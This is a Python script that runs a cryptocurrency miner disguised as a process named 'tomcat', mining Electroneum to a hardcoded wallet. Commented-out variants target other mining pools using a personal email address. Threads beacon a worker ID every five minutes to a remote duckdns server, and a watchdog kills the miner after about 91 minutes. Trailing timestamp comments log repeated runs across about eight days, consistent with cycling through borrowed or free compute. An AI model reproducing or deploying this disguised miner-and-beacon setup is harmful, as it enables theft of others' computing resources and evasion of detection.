import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:25:06.733859
#2018-02-17 16:10:05.828268
#2018-02-17 17:59:06.698539
#2018-02-17 19:48:06.680203
#2018-02-17 21:37:06.588451
#2018-02-17 23:23:03.606947
#2018-02-18 01:12:03.600668
#2018-02-18 02:59:06.961218
#2018-02-18 04:48:05.609891
#2018-02-18 06:38:03.610885
#2018-02-18 08:26:07.270959
#2018-02-18 10:13:05.109629
#2018-02-18 12:00:09.475127
#2018-02-18 13:44:03.496473
#2018-02-18 15:36:05.197263
#2018-02-18 17:24:04.121978
#2018-02-18 19:13:06.482938
#2018-02-18 20:59:04.908644
#2018-02-18 22:46:03.701291
#2018-02-19 00:35:06.606944
#2018-02-19 02:21:01.860122
#2018-02-19 04:08:03.750589
#2018-02-19 05:52:05.028265
#2018-02-19 07:42:04.312940
#2018-02-19 09:31:07.918878
#2018-02-19 11:21:06.714920
#2018-02-19 13:09:09.465895
#2018-02-19 14:57:08.739115
#2018-02-19 16:47:04.614685
#2018-02-19 18:35:05.544894
#2018-02-19 20:21:05.439551
#2018-02-19 22:10:09.089216
#2018-02-19 23:55:08.629339
#2018-02-20 01:42:03.990082
#2018-02-20 03:30:09.433729
#2018-02-20 05:17:07.968853
#2018-02-20 07:02:04.891250
#2018-02-20 08:49:02.194221
#2018-02-20 10:33:02.071499
#2018-02-20 12:18:01.845036
#2018-02-20 14:07:08.212668
#2018-02-20 15:52:01.825816
#2018-02-20 17:38:01.512698
#2018-02-20 19:28:06.666204
#2018-02-20 21:17:01.307628
#2018-02-20 23:01:08.084810
#2018-02-21 00:45:09.172893
#2018-02-21 02:31:06.478099
#2018-02-21 04:21:07.975074
#2018-02-21 06:09:07.096004
#2018-02-21 07:56:02.245034
#2018-02-21 09:42:07.992575
#2018-02-21 11:31:01.549280
#2018-02-21 13:21:05.969285
#2018-02-21 15:06:06.498507
#2018-02-21 16:55:15.021566
#2018-02-21 18:43:06.167022
#2018-02-21 20:32:07.448967
#2018-02-21 22:18:04.418504
#2018-02-22 00:09:01.361152
#2018-02-22 01:57:01.770270
#2018-02-22 03:44:05.826262
#2018-02-22 05:31:01.353234
#2018-02-22 07:16:08.438932
#2018-02-22 09:03:07.251955
#2018-02-22 10:50:07.693736
#2018-02-22 12:37:09.739348
#2018-02-22 14:22:08.404621
#2018-02-22 16:09:11.378606
#2018-02-22 17:55:06.054087
#2018-02-22 19:43:01.495526
#2018-02-22 21:34:01.956351
#2018-02-22 23:20:04.540627
#2018-02-23 01:07:05.012095
#2018-02-23 02:53:05.681445
#2018-02-23 04:41:07.832503
#2018-02-23 06:28:07.696596
#2018-02-23 08:15:10.098789
#2018-02-23 10:33:01.324138
#2018-02-23 12:24:05.177068
#2018-02-23 14:13:02.286700
#2018-02-23 16:05:10.299264
#2018-02-23 17:52:06.024187
#2018-02-23 19:39:03.828661
#2018-02-23 21:22:05.798437
#2018-02-23 23:11:01.444683
#2018-02-24 01:02:02.159806
#2018-02-24 02:54:03.410625
#2018-02-24 04:42:08.197690
#2018-02-24 06:26:05.110134
#2018-02-24 08:13:07.296813
#2018-02-24 09:57:01.378495
#2018-02-24 11:53:03.733768
#2018-02-24 13:44:05.511286
#2018-02-24 15:35:06.410698
#2018-02-24 17:28:05.294323
#2018-02-24 19:15:04.201329
#2018-02-24 21:02:07.127986
#2018-02-24 23:36:01.260089
#2018-02-25 02:56:07.209921
#2018-02-25 07:08:03.662607